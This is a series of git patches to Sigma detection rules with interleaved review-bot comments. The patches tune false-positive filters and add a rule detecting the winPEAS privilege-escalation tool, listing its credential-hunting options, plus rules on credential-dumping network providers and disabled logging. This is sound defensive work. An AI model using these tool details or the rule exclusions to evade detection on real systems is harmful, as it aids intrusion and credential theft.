diff --git a/rules/windows/file_event/file_event_win_win_shell_write_susp_files_extensions.yml b/rules/windows/file_event/file_event_win_win_shell_write_susp_files_extensions.yml index 5eb617acc..d3a27df93 100644 --- a/rules/windows/file_event/file_event_win_win_shell_write_susp_files_extensions.yml +++ b/rules/windows/file_event/file_event_win_win_shell_write_susp_files_extensions.yml @@ -9,6 +9,7 @@ references: - Internal Research author: Nasreddine Bencherchali date: 2022/08/12 +modified: 2022/09/18 logsource: category: file_event product: windows @@ -17,7 +18,7 @@ detection: Image|endswith: - '\rundll32.exe' #- '\svchost.exe' # Might generate some FP - - '\dllhost.exe' + #- '\dllhost.exe' # Too many FPs - '\smss.exe' - '\RuntimeBroker.exe' - '\sihost.exe' diff --git a/rules/windows/process_creation/proc_creation_win_ntfs_short_name_path_use_image.yml b/rules/windows/process_creation/proc_creation_win_ntfs_short_name_path_use_image.yml index dae3b3927..67657f150 100644 --- a/rules/windows/process_creation/proc_creation_win_ntfs_short_name_path_use_image.yml +++ b/rules/windows/process_creation/proc_creation_win_ntfs_short_name_path_use_image.yml @@ -11,7 +11,7 @@ references: - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN - https://twitter.com/frack113/status/1555830623633375232 date: 2022/08/07 -modified: 2022/08/22 +modified: 2022/09/18 logsource: category: process_creation product: windows @@ -20,7 +20,7 @@ detection: Image|contains: - '~1\' - '~2\' - filter: + filter1: - ParentImage: - C:\Windows\System32\Dism.exe - C:\Windows\System32\cleanmgr.exe # Spawns DismHost.exe with a shortened username (if too long) 
@@ -30,7 +30,14 @@ detection: - Product: 'InstallShield (R)' - Description: 'InstallShield (R) Setup Engine' - Company: 'InstallShield Software Corporation' - condition: selection and not filter + filter_installers: + - Image|contains|all: + - '\AppData\' + - '\Temp\' + - Image|endswith: + - '~1\unzip.exe' + - '~1\7zG.exe' + condition: selection and not 1 of filter* falsepositives: - Applications could use this notation occasionally which might generate some false positives. In that case Investigate the parent and child process. level: high diff --git a/rules/windows/process_creation/proc_creation_win_ntfs_short_name_use_image.yml b/rules/windows/process_creation/proc_creation_win_ntfs_short_name_use_image.yml index fceefa59e..4c53992f1 100644 --- a/rules/windows/process_creation/proc_creation_win_ntfs_short_name_use_image.yml +++ b/rules/windows/process_creation/proc_creation_win_ntfs_short_name_use_image.yml @@ -11,7 +11,7 @@ references: - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN - https://twitter.com/jonasLyk/status/1555914501802921984 date: 2022/08/06 -modified: 2022/08/12 +modified: 2022/09/18 logsource: category: process_creation product: windows @@ -37,9 +37,11 @@ detection: - '~2.js' - '~2.hta' filter: - ParentImage|endswith: + - ParentImage|endswith: - '\WebEx\WebexHost.exe' - '\thor\thor64.exe' + - '-installer.exe' # e.g. C:\Users\neo\Downloads\xampp-windows-x64-8.1.6-0-VS16-installer.exe + - Image|contains: '\vcredi' condition: selection and not filter falsepositives: - Unknown diff --git a/rules/windows/process_creation/proc_creation_win_susp_gup_execution.yml b/rules/windows/process_creation/proc_creation_win_susp_gup_execution.yml index a0305eede..b2d7e89af 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_gup_execution.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_gup_execution.yml 
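Review bot: the first alternative of `filter_installers` (`Image|contains|all` of `\AppData\` and `\Temp\`) exempts every short-name image path under a user's temp directory from a `level: high` rule, and that is also the most common location for user-executed payloads; the second alternative (`~1\unzip.exe`, `~1\7zG.exe`) is narrow, the first is not. Constrain it to the installer pattern that was observed, for example by adding the installer stub name under `Image|endswith` or pairing it with a `ParentImage` entry like those in `filter1`, and add a comment naming the FP it covers.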
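Review bot: the new `- '-installer.exe'` entry under `ParentImage|endswith` and `Image|contains: '\vcredi'` both key on naming alone — any parent whose file name ends in `-installer.exe` or any image path containing `vcredi` is excluded, with no path anchoring. The inline comment already shows the specific XAMPP installer that was observed; matching that more tightly (e.g. `- ParentImage|contains: '\xampp-windows-'`) would keep the exclusion to the observed case, and falsepositives (outside the hunk) should record that installer-named parents are now exempt.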
@@ -6,6 +6,7 @@ author: Nasreddine Bencherchali references: - https://twitter.com/nas_bench/status/1535322445439180803 date: 2022/06/10 +modified: 2022/09/18 logsource: category: process_creation product: windows @@ -16,7 +17,11 @@ detection: filter: Image|endswith: '\explorer.exe' CommandLine|contains: '\Notepad++\notepad++.exe' - condition: selection and not filter + filter_parent: + ParentImage|contains: '\Notepad++\updater\' + filter_null: + CommandLine: null + condition: selection and not 1 of filter* falsepositives: - Other parent binaries using GUP not currently identified level: high diff --git a/rules/windows/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml b/rules/windows/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml index c86ba586d..7cb98a4f5 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml @@ -4,7 +4,7 @@ status: experimental description: Detects various anomalies in relation to regsvr32.exe author: Florian Roth, oscd.community, Tim Shelton date: 2019/01/16 -modified: 2022/07/20 +modified: 2022/09/18 references: - https://subt0x10.blogspot.de/2017/04/bypass-application-whitelisting-script.html - https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/ @@ -73,6 +73,8 @@ detection: filter2: ParentImage: 'C:\Program Files\Box\Box\FS\streem.exe' CommandLine|contains: '\Program Files\Box\Box\Temp\' + filter_legitimate: + CommandLine|contains: '/s C:\Windows\System32\RpcProxy\RpcProxy.dll ' condition: 1 of selection* and not 1 of filter* fields: - CommandLine diff --git a/rules/windows/process_creation/proc_creation_win_susp_schtasks_env_folder.yml b/rules/windows/process_creation/proc_creation_win_susp_schtasks_env_folder.yml index 831dc9d60..f2bea0cd7 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_schtasks_env_folder.yml 
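Review bot: `filter_null` with `CommandLine: null` excludes every GUP process-creation event whose CommandLine field is absent, so a telemetry source that does not populate that field will never raise this rule, and no comment says which source produced the empty-field events. Add one, e.g. `filter_null: # CommandLine missing on <source — TODO record>; remove once the source populates it`, in the same spirit as the aurora TODO filters elsewhere in this series, and mirror the exclusion in falsepositives.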
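Review bot: `filter_legitimate` matches `CommandLine|contains: '/s C:\Windows\System32\RpcProxy\RpcProxy.dll '` with a trailing space inside the quotes; if the space is meant as a token delimiter it only matches when further arguments follow, so a command line that ends in `RpcProxy.dll` is not excluded and the FP this commit targets presumably still fires. Either drop the trailing space or anchor with `CommandLine|endswith: '\RpcProxy\RpcProxy.dll'` alongside a `ParentImage` constraint, and add a comment naming the component that performs this registration.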
+++ b/rules/windows/process_creation/proc_creation_win_susp_schtasks_env_folder.yml @@ -10,7 +10,7 @@ tags: - attack.t1053.005 author: Florian Roth date: 2022/02/21 -modified: 2022/07/28 +modified: 2022/09/18 logsource: product: windows category: process_creation @@ -36,7 +36,9 @@ detection: - 'C:\Windows\Temp' - 'C:\Perflogs' filter_mixed: - - CommandLine|contains: 'update_task.xml' + - CommandLine|contains: + - 'update_task.xml' + - '/Create /TN TVInstallRestore /TR' - ParentCommandLine|contains: 'unattended.ini' condition: ( all of selection1* or all of selection2* ) and not 1 of filter* falsepositives: diff --git a/rules/windows/registry/registry_event/registry_event_susp_atbroker_change.yml b/rules/windows/registry/registry_event/registry_event_susp_atbroker_change.yml index fc1844066..23cc3a56b 100644 --- a/rules/windows/registry/registry_event/registry_event_susp_atbroker_change.yml +++ b/rules/windows/registry/registry_event/registry_event_susp_atbroker_change.yml @@ -1,13 +1,13 @@ title: Atbroker Registry Change id: 9577edbb-851f-4243-8c91-1d5b50c1a39b -description: Detects creation/modification of Assisitive Technology applications and persistence with usage of ATs +description: Detects creation/modification of Assisitive Technology applications and persistence with usage of 'at' status: experimental author: Mateusz Wydra, oscd.community references: - http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/ - https://lolbas-project.github.io/lolbas/Binaries/Atbroker/ date: 2020/10/13 -modified: 2021/05/24 +modified: 2022/09/18 tags: - attack.defense_evasion - attack.t1218 @@ -23,5 +23,5 @@ detection: - 'Software\Microsoft\Windows NT\CurrentVersion\Accessibility\Configuration' condition: selection falsepositives: - - Creation of non-default, legitimate AT. -level: high + - Creation of non-default, legitimate at usage +level: medium 
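Review bot: the new `'/Create /TN TVInstallRestore /TR'` entry in `filter_mixed` has no comment saying which product creates that task (the name suggests a TeamViewer installer — TODO confirm), and a task-name substring is a weak discriminator for a rule about tasks pointing into world-writable folders. Add a comment such as `- '/Create /TN TVInstallRestore /TR' # TeamViewer installer restore task — TODO confirm` and consider pairing it with an `Image` or `ParentImage` constraint, as the `unattended.ini` alternative below it does with ParentCommandLine.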
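Review bot: the description now ends with `persistence with usage of 'at'`, and the falsepositives entry in the second hunk of this file becomes `legitimate at usage`; both read as the `at` scheduler command, whereas the rule (`Accessibility\Configuration` keys) is about Assistive Technology applications, which is what the original `ATs` abbreviated. Restore the meaning, e.g. `description: Detects creation/modification of Assistive Technology (AT) applications and persistence through AtBroker` and `- Creation of non-default, legitimate Assistive Technology (AT) entries`, which also fixes the pre-existing `Assisitive` typo.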
diff --git a/rules/windows/registry/registry_set/registry_set_add_port_monitor.yml b/rules/windows/registry/registry_set/registry_set_add_port_monitor.yml index cb1c122ea..069f95d0f 100644 --- a/rules/windows/registry/registry_set/registry_set_add_port_monitor.yml +++ b/rules/windows/registry/registry_set/registry_set_add_port_monitor.yml @@ -5,7 +5,7 @@ description: | A port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup. author: frack113 date: 2021/12/30 -modified: 2022/03/26 +modified: 2022/09/18 status: experimental references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.010/T1547.010.md @@ -24,6 +24,13 @@ detection: User|contains: # covers many language settings - 'AUTHORI' - 'AUTORI' + filter_leg1: + TargetObject|contains: 'Control\Print\Monitors\MONVNC\Driver' + filter_leg2: + TargetObject|contains|all: + - 'Control\Print\Environments\'' + - '\Drivers\' + - '\VNC Printer' condition: selection and not 1 of filter_* falsepositives: - Unknown diff --git a/rules/windows/registry/registry_set/registry_set_disable_autologger_sessions.yml b/rules/windows/registry/registry_set/registry_set_disable_autologger_sessions.yml index 5caf99e9d..72d5abdd5 100644 --- a/rules/windows/registry/registry_set/registry_set_disable_autologger_sessions.yml +++ b/rules/windows/registry/registry_set/registry_set_disable_autologger_sessions.yml @@ -7,6 +7,7 @@ references: - https://twitter.com/MichalKoczwara/status/1553634816016498688 - https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/ date: 2022/08/01 +modified: 2022/09/18 logsource: category: registry_set product: windows @@ -22,7 +23,9 @@ detection: - '\Enabled' - '\Start' Details: DWORD (0x00000000) - condition: all of selection* + filter_legitimate: + Image: 'C:\Windows\system32\wevtutil.exe' + condition: all of selection* and not 1 of filter* falsepositives: - Unknown level: high 
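Review bot: `filter_leg1` and `filter_leg2` are opaque names for exclusions covering a VNC printer driver registered as a port monitor; the rest of this series names filters after what they exempt (`filter_azure`, `filter_citrix`), so `filter_vnc_monitor` / `filter_vnc_printer_driver` with a short comment would be consistent. Both are `TargetObject|contains` substring matches on a rule whose purpose is catching new port monitors, so a comment recording the product and the observed key matters for later review, e.g. `filter_vnc_monitor: # <VNC product> printer driver — TODO record`. The unbalanced quote in `'Control\Print\Environments\''` is corrected by PATCH 056 below.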
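Review bot: `filter_legitimate` exempts `C:\Windows\system32\wevtutil.exe` wholesale from a rule that detects autologger sessions being disabled, yet wevtutil is also the built-in utility an operator would use to turn logging off, so the exclusion removes exactly the cases the rule exists for; falsepositives still says `- Unknown`. Narrow the filter to the invocation that was observed (for example by `ParentImage` or the specific `TargetObject` it touched) and record the legitimate source in falsepositives, with a comment such as `filter_legitimate: # <component> disables <session> via wevtutil — TODO record`.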
diff --git a/rules/windows/registry/registry_set/registry_set_new_network_provider.yml b/rules/windows/registry/registry_set/registry_set_new_network_provider.yml index 49a746ff1..b356a4de5 100644 --- a/rules/windows/registry/registry_set/registry_set_new_network_provider.yml +++ b/rules/windows/registry/registry_set/registry_set_new_network_provider.yml @@ -6,6 +6,7 @@ related: description: Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it author: Nasreddine Bencherchali date: 2022/08/23 +modified: 2022/09/18 status: experimental references: - https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/network-provider-settings-removed-in-place-upgrade @@ -25,7 +26,9 @@ detection: - '\System\CurrentControlSet\Services\LanmanWorkstation\NetworkProvider' - '\System\CurrentControlSet\Services\RDPNP\NetworkProvider' #- '\System\CurrentControlSet\Services\P9NP\NetworkProvider' # Related to WSL remove the comment if you use WSL in your ENV - condition: selection and not filter + filter_valid_procs: + Image: C:\Windows\System32\poqexec.exe + condition: selection and not 1 of filter* falsepositives: - Other legitimate network providers used and not filtred in this rule level: high From b052302ac04eeec0220a03ea7f399946c067aa56 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Sun, 18 Sep 2022 16:24:07 +0200 Subject: [PATCH 056/120] fix: syntax error --- .../registry/registry_set/registry_set_add_port_monitor.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/registry/registry_set/registry_set_add_port_monitor.yml b/rules/windows/registry/registry_set/registry_set_add_port_monitor.yml index 069f95d0f..5b66ed84b 100644 --- a/rules/windows/registry/registry_set/registry_set_add_port_monitor.yml +++ b/rules/windows/registry/registry_set/registry_set_add_port_monitor.yml 
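Review bot: `Image: C:\Windows\System32\poqexec.exe` is the only unquoted string value in this detection block; backslashes are literal in a YAML plain scalar so it parses, but the rest of the file single-quotes paths, so write `Image: 'C:\Windows\System32\poqexec.exe'`. The filter name `filter_valid_procs` and the hunk give no hint why that binary legitimately writes NetworkProvider keys — the file's reference on in-place upgrades suggests servicing (TODO confirm) — so an inline `# servicing/in-place upgrade executor — TODO confirm` comment would make the exclusion reviewable. The pre-existing typo `filtred` in falsepositives sits in the context lines and could be corrected in passing.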
@@ -28,7 +28,7 @@ detection: TargetObject|contains: 'Control\Print\Monitors\MONVNC\Driver' filter_leg2: TargetObject|contains|all: - - 'Control\Print\Environments\'' + - 'Control\Print\Environments\' - '\Drivers\' - '\VNC Printer' condition: selection and not 1 of filter_* From 6161fb91b311694fcf0dad7c3ec13938e92b122b Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Sun, 18 Sep 2022 16:33:49 +0200 Subject: [PATCH 057/120] fix: typo in modifier --- .../file_event/file_event_win_webshell_creation_detect.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/file_event/file_event_win_webshell_creation_detect.yml b/rules/windows/file_event/file_event_win_webshell_creation_detect.yml index ba9948640..5d246108f 100755 --- a/rules/windows/file_event/file_event_win_webshell_creation_detect.yml +++ b/rules/windows/file_event/file_event_win_webshell_creation_detect.yml @@ -32,7 +32,7 @@ detection: false_positive_system: Image: 'System' # fp : backup/restore from drivers false_positive_legitimate: - TargetFilename|comntains: '\xampp' + TargetFilename|contains: '\xampp' condition: ((selection_wwwroot and selection_ext1) or (selection_static and selection_ext2)) and not 1 of false_positive* falsepositives: - Legitimate administrator or developer creating legitimate executable files in a web application folder From 2a94527714d4f7cbf7ceba6028fab3f3fa9cf55f Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Mon, 19 Sep 2022 09:23:15 +0200 Subject: [PATCH 058/120] fix: FP with VBScript in registry key rule --- .../registry_set_vbs_payload_stored.yml | 14 ++++++-------- 1 file changed, 6 insertions(+), 8 deletions(-) diff --git a/rules/windows/registry/registry_set/registry_set_vbs_payload_stored.yml b/rules/windows/registry/registry_set/registry_set_vbs_payload_stored.yml index 049dc3869..935988c83 100644 --- a/rules/windows/registry/registry_set/registry_set_vbs_payload_stored.yml 
+++ b/rules/windows/registry/registry_set/registry_set_vbs_payload_stored.yml @@ -3,7 +3,7 @@ id: 46490193-1b22-4c29-bdd6-5bf63907216f description: Detects VBScript content stored into registry keys as seen being used by UNC2452 group status: experimental date: 2021/03/05 -modified: 2022/03/26 +modified: 2022/09/19 author: Florian Roth references: - https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/ @@ -14,14 +14,13 @@ detection: selection: EventType: SetValue TargetObject|contains: 'Software\Microsoft\Windows\CurrentVersion' - Details|contains: - - 'vbscript' - - 'jscript' - - 'mshtml' + Details|contains: + - 'vbscript:' + - 'jscript:' + - 'mshtml,' - 'RunHTMLApplication' - 'Execute(' - 'CreateObject' - - 'RegRead' - 'window.close' filter: TargetObject|contains: 'Software\Microsoft\Windows\CurrentVersion\Run' @@ -31,8 +30,7 @@ detection: Details|contains: - '\Microsoft.NET\Primary Interop Assemblies\Microsoft.mshtml.dll' - '<\Microsoft.mshtml,fileVersion=' - - 'FL_Microsoft_mshtml_dll_____X86.' - - 'Microsoft_mshtml_dll_1_____X86.' + - '_mshtml_dll_' - '<\Microsoft.mshtml,culture=' condition: selection and not 1 of filter* falsepositives: From 633037e3ccc8dd4335f74872cffe20780c148b5c Mon Sep 17 00:00:00 2001 From: Feathers <93973834+ionsor@users.noreply.github.com> Date: Mon, 19 Sep 2022 13:19:55 +0200 Subject: [PATCH 059/120] Create microsoft365_pst_export_alert.yml (#2665) --- .../m365/microsoft365_pst_export_alert.yml | 23 +++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 rules/cloud/m365/microsoft365_pst_export_alert.yml diff --git a/rules/cloud/m365/microsoft365_pst_export_alert.yml b/rules/cloud/m365/microsoft365_pst_export_alert.yml new file mode 100644 index 000000000..a9950ae28 --- /dev/null +++ b/rules/cloud/m365/microsoft365_pst_export_alert.yml 
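Review bot: the `Details|contains` list is tightened to `'vbscript:'`, `'jscript:'`, `'mshtml,'` and `'RegRead'` is dropped, but the reason — presumably that the bare tokens matched legitimate COM/registration data — is recorded nowhere in the rule, and the remaining single-token alternatives `'Execute('`, `'CreateObject'`, `'window.close'` stay as generic as before. Add a comment on the list, e.g. `Details|contains: # protocol-handler forms; bare 'vbscript'/'jscript' matched legitimate registrations — TODO record the FP`, so the coverage trade-off is auditable alongside the bumped `modified:` date.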
@@ -0,0 +1,23 @@ +title: PST Export Alert +id: 18b88d08-d73e-4f21-bc25-4b9892a4fdd0 +status: experimental +description: Alert on when a user has performed an eDiscovery search or exported a PST file from the search. This PST file usually has sensitive information including email body content +author: 'Sorina Ionescu' +date: 2022/02/08 +references: + - https://attack.mitre.org/techniques/T1114/ +logsource: + service: threat_management + product: m365 +detection: + selection: + eventSource: SecurityComplianceCenter + eventName: 'eDiscovery search started or exported' + status: success + condition: selection +falsepositives: + - PST export can be done for legitimate purposes but due to the sensitive nature of its content it must be monitored. +level: medium +tags: + - attack.collection + - attack.t1114 From a36724ffdf1baf74720fd66d3509db2ce4bf752d Mon Sep 17 00:00:00 2001 From: phantinuss <79651203+phantinuss@users.noreply.github.com> Date: Mon, 19 Sep 2022 11:27:17 +0200 Subject: [PATCH 060/120] fix: FP found in testing environment --- .../registry_set/registry_set_disable_winevt_logging.yml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/rules/windows/registry/registry_set/registry_set_disable_winevt_logging.yml b/rules/windows/registry/registry_set/registry_set_disable_winevt_logging.yml index 452485411..462cceb32 100644 --- a/rules/windows/registry/registry_set/registry_set_disable_winevt_logging.yml +++ b/rules/windows/registry/registry_set/registry_set_disable_winevt_logging.yml @@ -3,7 +3,7 @@ id: 2f78da12-f7c7-430b-8b19-a28f269b77a3 description: Detects tempering with the "Enabled" registry key in order to disable windows logging of a windows event channel author: frack113, Nasreddine Bencherchali date: 2022/07/04 -modified: 2022/09/08 +modified: 2022/09/19 status: experimental references: - https://twitter.com/WhichbufferArda/status/1543900539280293889 
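Review bot: the selection keys on the exact alert display name `eventName: 'eDiscovery search started or exported'`, which will silently stop matching if the alert policy is renamed or localized; if the log source exposes a stable policy identifier it should be preferred, or the dependency noted in a comment such as `eventName: '...' # display name of the built-in alert policy — TODO confirm a stable id exists`. The falsepositives entry reads as a justification (`... it must be monitored`) rather than naming a benign source; rephrase to e.g. `- Legitimate eDiscovery searches or PST exports performed by compliance or legal staff`. `author` is the only single-quoted metadata scalar; quote consistently with the rest of the file.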
@@ -27,6 +27,7 @@ detection: TargetObject|contains: - '\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-FileInfoMinifilter' - '\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ASN1\' + - '\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Kernel-AppCompat\' filter_empty: # This filter is related to aurora. Should be removed when fix is deployed. # TODO: Remove later Image: - '' From 52eae2c92b29eb121e7e59ecf9158d8d956cbb04 Mon Sep 17 00:00:00 2001 From: gs3cl <89155053+gs3cl@users.noreply.github.com> Date: Mon, 19 Sep 2022 20:25:18 +0200 Subject: [PATCH 061/120] new rule for winpeas tool --- ...c_creation_detect_execution_of_winPEAS.yml | 57 +++++++++++++++++++ 1 file changed, 57 insertions(+) create mode 100644 rules/windows/process_creation/proc_creation_detect_execution_of_winPEAS.yml diff --git a/rules/windows/process_creation/proc_creation_detect_execution_of_winPEAS.yml b/rules/windows/process_creation/proc_creation_detect_execution_of_winPEAS.yml new file mode 100644 index 000000000..5ef086252 --- /dev/null +++ b/rules/windows/process_creation/proc_creation_detect_execution_of_winPEAS.yml 
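Review bot: the new `Microsoft-Windows-Kernel-AppCompat\` channel entry, like the two above it, does not say which component legitimately changes its `Enabled` value, so a later reviewer cannot tell whether the exclusion is still required. Add an inline note, e.g. `# toggled by <component> on <OS build> — TODO record`, matching the TODO convention already used by the `filter_empty` aurora block in the same hunk.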
@@ -0,0 +1,57 @@ +title: Detect Execution of winPEAS +id: 98b53e78-ebaf-46f8-be06-421aafd176d9 +status: experimental +description: WinPEAS is a script that search for possible paths to escalate privileges on Windows hosts. The checks are explained on book.hacktricks.xyz +author: Georg Lauenstein +date: 2022/09/19 +references: + - https://github.com/carlospolop/PEASS-ng + - https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation +tags: + - attack.privilege_escalation + - attack.t1082 + - attack.t1087 + - attack.t1046 +logsource: + category: process_creation + product: windows +detection: + selection_img: + - Image|endswith: + - '\winPEASany.exe' + - '\winPEASany_ofs.exe' + - '\winPEASx64.exe' + - '\winPEASx64_ofs.exe' + - '\winPEASx86.exe' + - '\winPEASx86_ofs.exe' + - OriginalFileName: + - 'winPEAS.exe' # always the same + selection_cmd_args: + - CommandLine|contains: + - 'domain' # Enumerate domain information + - 'systeminfo' # Search system information + - 'userinfo' # Search user information + - 'processinfo' # Search processes information + - 'serviceinfo' # Search services information + - 'applicationsinfo' # Search installed applications information + - 'networkinfo' # Search network information + - 'windowscreds' # Search windows credentials + - 'browserinfo ' # Search browser information + - 'filesinfo ' # Search generic files that can contains credentials + - 'fileanalysis' # Search specific files that can contains credentials and for regexes inside files + - 'eventsinfo' # Display interesting events information + filter_sysinfo: + - Image|endswith: + - '\systeminfo.exe' # due to option "systeminfo" via winPEAS + - OriginalFileName: + - 'sysinfo.exe' + condition: (selection_img or selection_cmd_args) and not filter_sysinfo +fields: + - Image + - User + - CommandLine + - ParentCommandLine + - CurrentDirectory +falsepositives: + - Pentesting +level: high From 44a49914190ed714da6685442af6c7b0baa92af6 Mon Sep 17 00:00:00 2001 
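Review bot: `selection_cmd_args` fires on a command line that merely contains bare words such as `domain`, `systeminfo`, `userinfo` or `networkinfo`, and the condition ORs it with the image selection, so at `level: high` any unrelated process whose arguments contain those substrings will alert; `filter_sysinfo` only handles the systeminfo.exe case. Either AND the argument selection with the image/OriginalFileName selection, or restrict it to the multi-token combinations the tool actually emits; PATCH 064 later removes only `domain`. The tags list `attack.t1082`, `attack.t1087` and `attack.t1046`, which are Discovery techniques, under `attack.privilege_escalation` alone — add `attack.discovery`. `'browserinfo '` and `'filesinfo '` carry trailing spaces inside the quotes unlike their siblings; make the list consistent.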
From: gs3cl <89155053+gs3cl@users.noreply.github.com> Date: Mon, 19 Sep 2022 21:00:59 +0200 Subject: [PATCH 062/120] Update and rename proc_creation_detect_execution_of_winPEAS.yml to proc_creation_win_winpeas_tool.yml --- ...cution_of_winPEAS.yml => proc_creation_win_winpeas_tool.yml} | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename rules/windows/process_creation/{proc_creation_detect_execution_of_winPEAS.yml => proc_creation_win_winpeas_tool.yml} (98%) diff --git a/rules/windows/process_creation/proc_creation_detect_execution_of_winPEAS.yml b/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml similarity index 98% rename from rules/windows/process_creation/proc_creation_detect_execution_of_winPEAS.yml rename to rules/windows/process_creation/proc_creation_win_winpeas_tool.yml index 5ef086252..d093f55aa 100644 --- a/rules/windows/process_creation/proc_creation_detect_execution_of_winPEAS.yml +++ b/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml @@ -1,4 +1,4 @@ -title: Detect Execution of winPEAS +title: Detect Execution of winPEAS id: 98b53e78-ebaf-46f8-be06-421aafd176d9 status: experimental description: WinPEAS is a script that search for possible paths to escalate privileges on Windows hosts. The checks are explained on book.hacktricks.xyz From d8e806cf93e82ce0dc5ea5e92e29089c68659d40 Mon Sep 17 00:00:00 2001 From: gs3cl <89155053+gs3cl@users.noreply.github.com> Date: Mon, 19 Sep 2022 21:17:32 +0200 Subject: [PATCH 063/120] Update falsepositives and format --- .../proc_creation_win_winpeas_tool.yml | 11 ++++------- 1 file changed, 4 insertions(+), 7 deletions(-) diff --git a/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml b/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml index d093f55aa..92378f6ca 100644 --- a/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml +++ b/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml 
@@ -24,8 +24,7 @@ detection: - '\winPEASx64_ofs.exe' - '\winPEASx86.exe' - '\winPEASx86_ofs.exe' - - OriginalFileName: - - 'winPEAS.exe' # always the same + - OriginalFileName: 'winPEAS.exe' # always the same selection_cmd_args: - CommandLine|contains: - 'domain' # Enumerate domain information @@ -41,10 +40,8 @@ detection: - 'fileanalysis' # Search specific files that can contains credentials and for regexes inside files - 'eventsinfo' # Display interesting events information filter_sysinfo: - - Image|endswith: - - '\systeminfo.exe' # due to option "systeminfo" via winPEAS - - OriginalFileName: - - 'sysinfo.exe' + - Image|endswith: '\systeminfo.exe' # due to option "systeminfo" via winPEAS + - OriginalFileName: 'sysinfo.exe' condition: (selection_img or selection_cmd_args) and not filter_sysinfo fields: - Image @@ -53,5 +50,5 @@ fields: - ParentCommandLine - CurrentDirectory falsepositives: - - Pentesting + - Should not be any as administrators do not use this tool level: high From 86a4f24ce8b085105c768b8f24ca6257669bfce0 Mon Sep 17 00:00:00 2001 From: gs3cl <89155053+gs3cl@users.noreply.github.com> Date: Mon, 19 Sep 2022 22:36:18 +0200 Subject: [PATCH 064/120] del "domain" under CommandLine --- .../windows/process_creation/proc_creation_win_winpeas_tool.yml | 1 - 1 file changed, 1 deletion(-) diff --git a/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml b/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml index 92378f6ca..cc52a318a 100644 --- a/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml +++ b/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml @@ -27,7 +27,6 @@ detection: - OriginalFileName: 'winPEAS.exe' # always the same selection_cmd_args: - CommandLine|contains: - - 'domain' # Enumerate domain information - 'systeminfo' # Search system information - 'userinfo' # Search user information - 'processinfo' # Search processes information 
From 9bfd2c729fb9ba4c1261d8407a44266436ae2b1d Mon Sep 17 00:00:00 2001 From: gs3cl <89155053+gs3cl@users.noreply.github.com> Date: Mon, 19 Sep 2022 23:00:02 +0200 Subject: [PATCH 065/120] change condition and format --- .../process_creation/proc_creation_win_winpeas_tool.yml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml b/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml index cc52a318a..d591a8b10 100644 --- a/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml +++ b/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml @@ -16,7 +16,7 @@ logsource: category: process_creation product: windows detection: - selection_img: + winpeas_basic: - Image|endswith: - '\winPEASany.exe' - '\winPEASany_ofs.exe' @@ -25,7 +25,7 @@ detection: - '\winPEASx86.exe' - '\winPEASx86_ofs.exe' - OriginalFileName: 'winPEAS.exe' # always the same - selection_cmd_args: + winpeas_option: - CommandLine|contains: - 'systeminfo' # Search system information - 'userinfo' # Search user information @@ -41,7 +41,7 @@ detection: filter_sysinfo: - Image|endswith: '\systeminfo.exe' # due to option "systeminfo" via winPEAS - OriginalFileName: 'sysinfo.exe' - condition: (selection_img or selection_cmd_args) and not filter_sysinfo + condition: 1 of winpeas_* and not filter_sysinfo fields: - Image - User From 9e589736c2d2e7c106ca6cc7560f942a9e5d7170 Mon Sep 17 00:00:00 2001 From: gs3cl <89155053+gs3cl@users.noreply.github.com> Date: Mon, 19 Sep 2022 23:23:28 +0200 Subject: [PATCH 066/120] Update proc_creation_win_winpeas_tool.yml --- .../proc_creation_win_winpeas_tool.yml | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml b/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml index d591a8b10..ee5604ae5 100644 
